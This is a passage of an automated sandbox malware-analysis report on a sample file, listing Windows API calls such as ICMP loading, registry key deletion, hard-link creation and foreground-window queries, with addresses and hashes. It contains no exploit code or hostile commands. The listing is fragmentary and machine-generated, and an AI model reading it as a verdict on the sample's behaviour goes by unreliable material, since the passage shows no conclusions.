                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$LabelVolume
                          • String ID: \VH
                          • API String ID: 2006950084-234962358
                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                          APIs
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • GetMenuItemInfoW.USER32 ref: 00449727
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                          • DrawMenuBar.USER32 ref: 00449761
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw_malloc
                          • String ID: 0
                          • API String ID: 772068139-4108050209
                          • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                          • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$_wcscpy
                          • String ID: 3, 3, 8, 1
                          • API String ID: 3469035223-357260408
                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                          APIs
                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ICMP.DLL$IcmpCloseHandle
                          • API String ID: 2574300362-3530519716
                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                          APIs
                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ICMP.DLL$IcmpCreateFile
                          • API String ID: 2574300362-275556492
                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                          APIs
                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ICMP.DLL$IcmpSendEcho
                          • API String ID: 2574300362-58917771
                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0047950F
                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                          • VariantClear.OLEAUT32(?), ref: 00479650
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$AllocClearCopyInitString
                          • String ID:
                          • API String ID: 2808897238-0
                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                          APIs
                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                          • __itow.LIBCMT ref: 004699CD
                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                          • __itow.LIBCMT ref: 00469A97
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                          • ScreenToClient.USER32(?,?), ref: 00449A80
                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                          • String ID:
                          • API String ID: 2782032738-0
                          • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                          • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                          APIs
                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                          • GetWindowRect.USER32(?,?), ref: 00441722
                          • PtInRect.USER32(?,?,?), ref: 00441734
                          • MessageBeep.USER32(00000000), ref: 004417AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                          APIs
                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                          • __isleadbyte_l.LIBCMT ref: 004208A6
                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                          APIs
                          • GetParent.USER32(?), ref: 004503C8
                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Proc$Parent
                          • String ID:
                          • API String ID: 2351499541-0
                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                          • TranslateMessage.USER32(?), ref: 00442B01
                          • DispatchMessageW.USER32(?), ref: 00442B0B
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Message$Peek$DispatchTranslate
                          • String ID:
                          • API String ID: 1795658109-0
                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                          APIs
                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                          • GetCaretPos.USER32(?), ref: 004743B2
                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                          • GetForegroundWindow.USER32 ref: 004743EE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
